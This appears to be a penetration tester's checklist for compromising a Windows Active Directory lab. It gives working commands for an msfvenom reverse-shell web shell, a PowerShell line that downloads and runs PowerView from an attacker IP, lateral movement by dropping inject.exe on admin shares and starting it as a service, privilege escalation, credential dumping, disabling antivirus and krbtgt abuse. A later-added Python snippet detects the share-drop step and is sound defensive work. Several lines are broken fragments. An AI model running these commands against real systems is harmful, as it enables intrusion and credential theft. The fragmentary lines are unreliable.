Checklist / Flow
Enumeration; also check for 5985/5986 for evil-winrm
sudo nmap -A -sC -Pn 192.168.120.130-132 -vv
Check web server:
email present = phishing with doc / hta
command utilities / debug page = cmd injection RCE with rev.ps1
upload available = web shell (e.g. aspx)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f aspx -o /home/kali/met.aspx
finding upload dir:
gobuster dir -e -u http://192.168.120.132/ -w /usr/share/wordlists/dirb/common.txt
Post-Exploit Enum
QoL: meterpreter - execute -H -f notepad
-> migrate
Check:
to run
(new-object system.net.webclient).downloadstring('http://192.168.119.120/powerview.ps1') | IEX
Get-DomainComputer, Get-DomainUser, Get-DomainGroup, Kerberos delegation
Privilege Escalation: PrintSpoofer when running as a service account
Dump , (meterpreter upload/download), enum for config files, custom files, etc.
Use the credentials to perform possible
Possibly become the admin user on a vulnerable server via PtT with impersonated tickets > disable AV
Transfer files through shares (controlled host 1 to newly compromised host 2):
copy C:\inetpub\wwwroot\upload\inject.exe \\file01\c$
use with to control host 2 from host 1
copy c:\inject.exe \\dc02\c$
-> lat.exe dc02 sensorservice C:\inject.exe
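Defender-side counterpart to the share-copy and remote-service step above, added here and not part of the original notes: it correlates a write to an admin share (Event 5145) with a service installed on the same host shortly afterwards (Event 7045) pointing at the dropped file. The pipe-delimited log format and the sample events are constructed assumptions for this example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not from any real host). Assumed simplified
# format: timestamp|event_id|host|key=value ...  Lines are in time order.
SAMPLE_EVENTS = """
2024-01-10T09:00:01|5145|FILE01|share=\\\\*\\C$ path=inject.exe access=WriteData user=WEB01$
2024-01-10T09:00:09|7045|FILE01|service=sensorservice path=C:\\inject.exe user=svc_iis
2024-01-10T09:05:00|5145|DC02|share=\\\\*\\C$ path=inject.exe access=WriteData user=svc_iis
2024-01-10T10:30:00|7045|DC02|service=sensorservice path=C:\\inject.exe user=svc_iis
2024-01-10T11:00:00|5145|FILE01|share=\\\\*\\NETLOGON path=logon.bat access=ReadData user=jdoe
"""

ADMIN_SHARES = ("C$", "ADMIN$")  # shares commonly used to drop a binary

def parse(line):
    """Split one log line into (timestamp, event_id, host, fields dict)."""
    ts, eid, host, details = line.split("|", 3)
    fields = dict(kv.split("=", 1) for kv in details.split())
    return datetime.fromisoformat(ts), int(eid), host, fields

def basename(path):
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()

def correlate(lines, window_minutes=15):
    """Return (host, binary, service, user) for every 7045 whose service
    binary was written to an admin share on the same host within the window."""
    window = timedelta(minutes=window_minutes)
    writes = defaultdict(list)  # host -> [(time, filename written)]
    alerts = []
    for line in lines:
        ts, eid, host, f = parse(line)
        if (eid == 5145 and f.get("access") == "WriteData"
                and basename(f["share"]).upper() in ADMIN_SHARES):
            writes[host].append((ts, basename(f["path"])))
        elif eid == 7045:
            binary = basename(f["path"])
            for wts, name in writes[host]:
                if name == binary and timedelta(0) <= ts - wts <= window:
                    alerts.append((host, binary, f["service"], f["user"]))
    return alerts

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS.strip().splitlines()):
        print("admin-share drop followed by service install:", alert)
```

With the default 15-minute window only FILE01 is flagged; DC02's service install comes 85 minutes after the write, so widening the window is what surfaces the slower second hop.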
Repeat cred dumps..., possible to look for
when the domain is compromised, for other account access, with the krbtgt of the DC